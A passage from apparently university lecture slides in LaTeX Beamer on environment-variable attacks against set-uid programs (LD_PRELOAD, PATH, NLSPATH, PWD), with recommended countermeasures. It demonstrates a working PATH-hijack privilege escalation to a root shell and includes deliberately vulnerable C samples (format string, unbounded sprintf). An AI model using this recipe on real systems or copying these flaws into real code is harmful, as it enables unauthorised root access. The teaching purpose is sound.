-rwsr-xr-x 1 root ssd 35000 oct  9 07:36 myenv
ssd@ssd-vb:~$ export LD_PRELOAD=./libmymaliciouslib.so
ssd@ssd-vb:~$ export LD_LIBRARY_PATH=.
ssd@ssd-vb:~$ export LD_MYOWN="stuff"
ssd@ssd-vb:~$ env | grep LD_
LD_PRELOAD=./libmymaliciouslib.so
LD_LIBRARY_PATH=.
LD_MYOWN="stuff"
ssd@ssd-vb:~$ myenv | grep LD_
LD_MYOWN="stuff"
\end{lstlisting}
\begin{itemize}
\item The variables have been ignored
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attack via external program}
\begin{itemize}[<+->]
\item Sometimes, applications call external programs
\item For a privileged program, the attack surface is expanded with these external programs
	\begin{itemize}
	\item Every "input" has to be considered
	\item In particular, environment variables
	\end{itemize}
\item There are two ways to invoke an external program
	\begin{itemize}
	\item \texttt{exec} familly on functions,
	\item \texttt{system},
	\end{itemize}
	both eventually using the \texttt{execve} system call.
\item \texttt{system} does not run the program directly
	\begin{itemize}
	\item Opens the shell and asks it to execute the program
	\end{itemize}
\item In this case, the attack surface also includes the shell
	\begin{itemize}
	\item In this section, we look into environment variables
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{The \texttt{PATH} environment variable}
\begin{itemize}
\item When a program runs a command, the shell looks for the command using \texttt{PATH}
	\begin{itemize}
	\item If the location was not specified
	\end{itemize}
\end{itemize}
\begin{lstlisting}
#include <stdlib.h>

int main()
{
	system("cal");
}
\end{lstlisting}
\begin{itemize}
\item We want to get \texttt{root}
\end{itemize}
\begin{lstlisting}
#include <stdlib.h>

int main()
{
	system("/bin/dash");
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ sudo chown root cal-vul
ssd@ssd-vb:~$ sudo chmod 4755 cal-vul
ssd@ssd-vb:~$ ./cal-vul
    Octobre 2019
di lu ma me je ve sa
       1  2  3  4  5
 6  7  8  9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
ssd@ssd-vb:~$ export PATH=.:$PATH
ssd@ssd-vb:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin: ...
ssd@ssd-vb:~$ ./cal-vul
#
#id
uid=1000(ssd) gid=1000(ssd) euid=0(root) groupes=1000(ssd), ...
\end{lstlisting}
\begin{itemize}
\item It is safer to use \texttt{execve} because it does not open a shell
	\begin{itemize}
	\item The attack surface is reduced
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attack via library}
\begin{itemize}[<+->]
\item Programs very often use functions provided by libraries
\item These functions may or may not use environment variables
\item If they do, they increase the attack surface
\item Risk for privileged programs
\end{itemize}
\begin{exampleblock}<+->{Example}
	\begin{itemize}[<+->]
	\item Unix provides internationalisation from the Locale subsystem
	\item Database and library functions
	\item Goal : display messages in the user's language
	\item Translation found based on \texttt{LANG}, \texttt{NLSPATH}, etc.
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}
#include <stdio.h>
#include <libintl.h>

int main(int argc, int** argv)
{
	if(argc > 1)
		printf(gettext("usage : %s filemane "), argv[0]); //format string vulnerability
	else
		printf("Ok\n");
}
\end{lstlisting}
\begin{itemize}
\item Warning : the countermeasure for the attack surface related to libraries lies with the library author
	\begin{itemize}
	\item Not the OS
	\end{itemize}
\item Here, the library ignores \texttt{NLSPATH} if \texttt{catopen} or \texttt{catgets} are called on set-uid programs
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attack via application code}
\begin{itemize}[<+->]
\item Programs may use environment variables directly
\item When a command is executed, a new process is created
\item The shell sets the environment variables of that process using shell variables
\item If a program gets an environment variable from these inputs, it actually gets the value of the parent process
\item This value can be tempered by the user
\item On privileged programs, these inputs are not to be trusted
\end{itemize}
\begin{exampleblock}<+->{Safety}
	\begin{itemize}[<+->]
	\item When environment variables are used in privileged programs, they have to be sanitised
		\begin{itemize}
		\item Length, shape, etc.
		\item Use \texttt{secure\_getenv}
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}
#include <stdio.h>
#include <stdlib.h>

int main(int argc, int** argv)
{
	char buff[128];

	char * pwd = getenv("PWD");
	if(pwd != NULL)
	{
		sprintf(buff, "Present working directory is %s", pwd);
		printf("%s\n", buff);
	}
}
\end{lstlisting}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ pwd
/home/ssd
ssd@ssd-vb:~$ echo $PWD
/home/ssd
ssd@ssd-vb:~$ ./printpwd-vul
Present working directory is /home/ssd
ssd@ssd-vb:~$ PWD=malicious
ssd@ssd-vb:~$ ./printpwd-vul
Present working directory is malicious
\end{lstlisting}
\begin{itemize}
\item Often, this is used to create buffer overflow
\end{itemize}
\end{frame}

\end{document}
